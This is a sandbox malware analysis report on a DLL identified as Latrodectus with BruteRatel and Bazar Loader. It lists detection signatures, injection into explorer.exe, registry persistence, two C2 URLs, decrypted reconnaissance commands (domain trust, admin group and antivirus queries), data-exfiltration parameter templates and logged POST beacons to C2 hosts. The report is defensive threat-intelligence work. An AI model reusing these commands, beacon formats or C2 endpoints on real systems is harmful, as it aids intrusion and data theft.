Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
upfilles.dll.dll

Overview

General Information

Sample name:upfilles.dll.dll
(renamed file extension from exe to dll)
Original sample name:upfilles.dll.exe
Analysis ID:1439879
MD5:ccb6d3cb020f56758622911ddd2f1fcb
SHA1:4a013f752c2bf84ca37e418175e0d9b6f61f636d
SHA256:f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
Tags:exe
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6632 cmdline: loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 344 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5472 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • regsvr32.exe (PID: 2180 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • rundll32.exe (PID: 6296 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6324 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 6688 cmdline: C:\Windows\system32\WerFault.exe -u -p 6324 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 6516 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 3732 cmdline: C:\Windows\system32\WerFault.exe -u -p 6516 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7264 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7272 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7388 cmdline: C:\Windows\system32\WerFault.exe -u -p 7272 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7288 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7396 cmdline: C:\Windows\system32\WerFault.exe -u -p 7288 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7296 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7320 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 7856 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
        • rundll32.exe (PID: 7984 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel is a a Customized Command and Control Center for Red Team and Adversary SimulationSMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more.Built-in debugger to detect EDR userland hooks.Ability to keep memory artifacts hidden from EDRs and AV.Direct Windows SYS calls on the fly.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Unidentified 111 (Latrodectus), LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
    00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
        00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
          00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.3.rundll32.exe.7df4f0220000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
              22.0.explorer.exe.13a0000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                18.3.rundll32.exe.7df4f0220000.0.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                  22.0.explorer.exe.13a0000.0.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                    22.2.explorer.exe.13a0000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: RunDLL32 Spawning Explorer
                      Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7320, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32 "C:\Users\user\AppData\Roaming\upfilles.dll", stow...`.U. `.....#..p..8.. `......., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 7320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 22.0.explorer.exe.13a0000.0.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}
                      Multi AV Scanner detection for submitted file
                      Source: upfilles.dll.dllReversingLabs: Detection: 15%
                      Sample uses string decryption to hide its real strings
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c ipconfig /all
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c systeminfo
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c nltest /domain_trusts
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net view /all /domain
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net view /all
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &ipconfig=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net group "Domain Admins" /domain
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c net config workstation
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /c whoami /groups
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &systeminfo=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &domain_trusts=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &domain_trusts_all=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_view_all_domain=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_view_all=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_group=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &wmic=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_config_ws=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &net_wmic_av=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &whoami_group=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "pid":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%d",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "proc":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%s",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "subproc": [
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &proclist=[
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "pid":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%d",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "proc":
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%s",
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "subproc": [
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &desklinks=[
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: *.*
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: "%s"
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Update_%x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Custom_update
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: .dll
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: .exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: runnung
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: -.V71R?b;<=>&GAg"Ovz_~zzva6WQp2
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: [8<z'Hsw)sXs[wsoVWXYZ[r;X\@hS1W{S9_<S!WUSpqrsZp
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: ;[8<H'sws]sXwsoo(?8fI/^3753hijkBhlX;1*
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: /files/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Electrol
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: .+`lgSRHYJPpU\IETT05?=CAI
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: POST
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: GET
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: curl/7.88.1
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: p:
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: URLS
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: COMMAND
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: ERROR
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: -./012R35Q^U0R]v?z4~:z5v!YRYOIJ_
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: sZp
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: @-
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: <html>
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: <!DOCTYPE
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %s%d.dll
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: 12345
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &stiller=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %s%d.exe
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: LogonTrigger
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %x%x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: TimeTrigger
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: PT0H%02dM
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &mac=
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %02x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: :%02x
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: PT0S
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &computername=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: &domain=%s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: \*.dll
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: @ACDEGwIuKMNOPQRSTUx1^ZR=/m=m6U0U:],]'U%U*-s-~5V5P=W=Z5Y5V-s
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: https://workspacin.cloud/live/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: https://illoskanawer.com/live/
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: AppData
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Desktop
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Startup
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Personal
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Local AppData
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      Source: 22.0.explorer.exe.13a0000.0.unpackString decryptor: \update_data.dat
                      Source: unknownHTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
                      Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800192B8 FindFirstFileExW,6_2_00000001800192B8
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,22_2_013A8BA8
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,22_2_013A1A08
                      Source: C:\Windows\explorer.exeCode function: 22_2_013ADCE0 FindFirstFileW,22_2_013ADCE0

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 138.124.183.215 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.69.236.35 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 91.194.11.183 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 54.175.181.104 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 95.164.68.73 443Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.155 443Jump to behavior
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://workspacin.cloud/live/
                      Source: Malware configuration extractorURLs: https://illoskanawer.com/live/
                      Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
                      Source: Joe Sandbox ViewASN Name: NOKIA-ASFI NOKIA-ASFI
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: HQservCommunicationSolutionsIL HQservCommunicationSolutionsIL
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 656Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 444Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
